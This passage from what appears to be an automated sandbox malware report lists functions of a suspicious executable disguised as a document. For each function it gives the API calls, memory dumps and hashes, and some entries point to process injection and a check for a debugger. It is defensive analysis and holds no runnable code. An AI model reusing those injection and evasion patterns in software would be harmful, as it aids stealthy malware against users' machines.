                                                          • Part of subcall function 007132DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0071330B
                                                          • Part of subcall function 0071374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0071376D
                                                          • Part of subcall function 0071374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0071377F
                                                          • Part of subcall function 0071374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\DOC092024-0431202229487.exe,00000104,?,007D1120,C:\Users\user\Desktop\DOC092024-0431202229487.exe,007D1124,?,?), ref: 007137EE
                                                          • Part of subcall function 0071374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00713860
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00713726
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                        • String ID:
                                                        • API String ID: 3809921791-0
                                                        • Opcode ID: 19d992e328cd8f453f5f14862d7403477141f9dc373680bdadd573fd36bc80c1
                                                        • Instruction ID: 3224a64c31384f7b65f14a32cce86d90fa92ed975380c87b89b4c25d86d37a07
                                                        • Opcode Fuzzy Hash: 19d992e328cd8f453f5f14862d7403477141f9dc373680bdadd573fd36bc80c1
                                                        • Instruction Fuzzy Hash: D3118171908341EBC310EF69E94990ABFF8FF94710F00851FF444832A2DB789946CB96
                                                        Function 0073F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 0073F7D9
                                                        • __close_nolock.LIBCMT ref: 0073F7F2
                                                          • Part of subcall function 0073886A: __getptd_noexit.LIBCMT ref: 0073886A
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                        • String ID:
                                                        • API String ID: 1046115767-0
                                                        • Opcode ID: b4de08453b027825fd42496d818f1e07f9dc6d831d9e3b7ac65a0cc8bd48c398
                                                        • Instruction ID: 53390651ab4d2d7a7959758e2a0ca77eec73da229e99c70f3356f44f70712a86
                                                        • Opcode Fuzzy Hash: b4de08453b027825fd42496d818f1e07f9dc6d831d9e3b7ac65a0cc8bd48c398
                                                        • Instruction Fuzzy Hash: F111C272D16614DEF7197F68D84A3DC77A05F41371FA54260E5205F2E3CBBCA90086A6
                                                        Function 007344C9 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: 210d6491a8b9a2399c97d3b52e8df805fbf9165a5c4ba00b0cd754b946ac0741
                                                        • Instruction ID: ee18c51b8a31f6c3d771a411e24e847cd80c49ae2184e482029c584e5c1ebd34
                                                        • Opcode Fuzzy Hash: 210d6491a8b9a2399c97d3b52e8df805fbf9165a5c4ba00b0cd754b946ac0741
                                                        • Instruction Fuzzy Hash: 940184B1C00209EBEF25AF699C0999F7B71BF80760F148215F42416193E7399A21EB91
                                                        Function 00734274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • __lock_file.LIBCMT ref: 007342B9
                                                          • Part of subcall function 00735A9F: __lock.LIBCMT ref: 00735AC2
                                                        • __fclose_nolock.LIBCMT ref: 007342C4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 78caf4d5447777ffc4cf1b920322d850d22c28e970f3af0a7832cce0be5c16d5
                                                        • Instruction ID: e838f5e0d3f2578aaa02abce5cb021945450f859f7cb38f3a10157153e5c7bbb
                                                        • Opcode Fuzzy Hash: 78caf4d5447777ffc4cf1b920322d850d22c28e970f3af0a7832cce0be5c16d5
                                                        • Instruction Fuzzy Hash: 79F0B472801708DAF728AB79880AB5F6BD07F41334F218209B824BB1C3CB7CA9019B55
                                                        Function 04D7129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 04D71A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04D71AF1
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 04D71B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction ID: c082b0951f42ddf1cf4f408a423160ea78713e83bd549538683795ae94e357ec
                                                        • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction Fuzzy Hash: 5E12DD24E24658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A4E77A5F81CB5A
                                                        Function 0078AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 64a6ce5cdeccd3a1eda4ee4f790808e6738ecb720426c01faf0d91e7a443e3fb
                                                        • Instruction ID: 7de28f6955f39a0b92caa7449e580003b444a5c08f2a69e21ec6971100034550
                                                        • Opcode Fuzzy Hash: 64a6ce5cdeccd3a1eda4ee4f790808e6738ecb720426c01faf0d91e7a443e3fb
                                                        • Instruction Fuzzy Hash: CA413A70504651CFEB24DF18D448B1ABBE1BF45304F19856CE9964B362C339EC85CF92
                                                        Function 0073FAB6 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit
                                                        • String ID:
                                                        • API String ID: 3074181302-0
                                                        • Opcode ID: 7d73569efa0ed76dc4c1848710279fc417d3be7bbfd0392529b60d979c86bf13
                                                        • Instruction ID: 2ea4a9c7ff71274908f7f6953bb4655e80261d97cf0b401f8b3aed39baf1e146
                                                        • Opcode Fuzzy Hash: 7d73569efa0ed76dc4c1848710279fc417d3be7bbfd0392529b60d979c86bf13
                                                        • Instruction Fuzzy Hash: 9C218BF2D11604CFFB116FB8C859799B7A06F423A1F6546A0F5604B1E3CBBC98008B66
                                                        Function 00713F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00713F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00713F90
                                                          • Part of subcall function 00734129: __wfsopen.LIBCMT ref: 00734134
                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007134E2,?,00000001), ref: 00713FCD
                                                          • Part of subcall function 00713E78: FreeLibrary.KERNEL32(00000000), ref: 00713EAB
                                                          • Part of subcall function 00714010: _memmove.LIBCMT ref: 0071405A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: e2a860e49bbdbcc569e3a055ee6554a0996bf15b1109985165162247e0fba2df
                                                        • Instruction ID: 49c8b0d2cabc00d09579b04183ead3744d96b657b5100bacb358c3c44ef917a1
                                                        • Opcode Fuzzy Hash: e2a860e49bbdbcc569e3a055ee6554a0996bf15b1109985165162247e0fba2df
                                                        • Instruction Fuzzy Hash: 2B11A332610309FACB24BB68DC0ABDD76A9AF50B41F108829F542E71C1DB7C9E85AB50
                                                        Function 0078AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 8e6e6d0b56abf3701c747829dc9b611b6665ea0b443b5c0b1a17c5e202945348
                                                        • Instruction ID: ea4c7d816aff1aa49f2f2e019d943ef62c23ce2ce36d433aeea1150186335366
                                                        • Opcode Fuzzy Hash: 8e6e6d0b56abf3701c747829dc9b611b6665ea0b443b5c0b1a17c5e202945348
                                                        • Instruction Fuzzy Hash: 90212570508651CFEB24DF28D448B1ABBE1BF89344F154968E99647622C339F885CFA2
                                                        Function 0073BD14 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 0073BD73
                                                          • Part of subcall function 0073886A: __getptd_noexit.LIBCMT ref: 0073886A
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                        • String ID:
                                                        • API String ID: 1144279405-0
                                                        • Opcode ID: 2182703caa611f48bd50398bbb22b94a4909bd32c7a4cf8f95918a31f5f92603
                                                        • Instruction ID: f12716ddeaccb3f0c9588988c877b85eb27daef438d5b84162d3d40bfb82a49f
                                                        • Opcode Fuzzy Hash: 2182703caa611f48bd50398bbb22b94a4909bd32c7a4cf8f95918a31f5f92603
                                                        • Instruction Fuzzy Hash: 2E119172A25614DFF7126F64D84A79C77606F41331FA54244F6640F1E3DBBC99008BA6
                                                        Function 0071CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                        • Instruction ID: 25650c7ebe5d70084d8ece8907b7ce62483d1c5965268cf5e7669fd316fa8c4d
                                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                        • Instruction Fuzzy Hash: EB01FEB1144701AED3259B7CD80BE66B7B4DF44760F50C53EF55ACB1D1EB75E4408690
                                                        Function 00751255 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0074A857: CLSIDFromProgID.COMBASE ref: 0074A874
                                                          • Part of subcall function 0074A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0074A88F
                                                          • Part of subcall function 0074A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0074A89D
                                                          • Part of subcall function 0074A857: CoTaskMemFree.COMBASE(00000000), ref: 0074A8AD
                                                        • IIDFromString.COMBASE(00000000,?), ref: 0075128C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: ec7a456b5f475e0187c2648f8f2bfc794b37e1a68978fc86bce6ca8a4d2bb4b1
                                                        • Instruction ID: 65494e4f0adb115d8c8eeee0acd167ed725055d175cdd7ece9264f74fe47e6cd
                                                        • Opcode Fuzzy Hash: ec7a456b5f475e0187c2648f8f2bfc794b37e1a68978fc86bce6ca8a4d2bb4b1
                                                        • Instruction Fuzzy Hash: 73F09075240205EBCB00CE05D880FD67B69FB49332F50C129ED08CE105D7F9E949CBA0
                                                        Function 0073373E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 0073377D
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: 1841c7cf978532abda3bd14b84061f9da728628892cabf96d714569d4d070716
                                                        • Instruction ID: d08fb11306572869762d1de99a168b1fcd08775e2966894c805af3d9289d9e3c
                                                        • Opcode Fuzzy Hash: 1841c7cf978532abda3bd14b84061f9da728628892cabf96d714569d4d070716
                                                        • Instruction Fuzzy Hash: 8EF062F1500209EAFF31AF748C4A7EE7660AF00321F148514B4149A193D77D8B50DB91
                                                        Function 00713E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,007134E2,?,00000001), ref: 00713E6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 152de02c9cf2391e5a78aae096e0c4897a9e05fe2410de62648e73f2ca0964bc
                                                        • Instruction ID: 3f99b06d5ca894612bba6b024f996d62467fd733492aa246b59017f271f8e031
                                                        • Opcode Fuzzy Hash: 152de02c9cf2391e5a78aae096e0c4897a9e05fe2410de62648e73f2ca0964bc
                                                        • Instruction Fuzzy Hash: E7F039B5101741CFDB349F68D494893BBF0BF047153248A3FE1D682661C739A988DF00
                                                        Function 0075C5E0 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 492180ca1bef3efad2d53918f452df281755ef4fe598974afbbc038f049d315f
                                                        • Instruction ID: e5290028ab8cdc0fb91abbb08492761511dd778a98ef8263a296ff2c78109d3b
                                                        • Opcode Fuzzy Hash: 492180ca1bef3efad2d53918f452df281755ef4fe598974afbbc038f049d315f
                                                        • Instruction Fuzzy Hash: FEE092B1604B009FDF398A24D8407E373E8DB45311F00081DF6AA82243E6B278098649
                                                        Function 00734129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
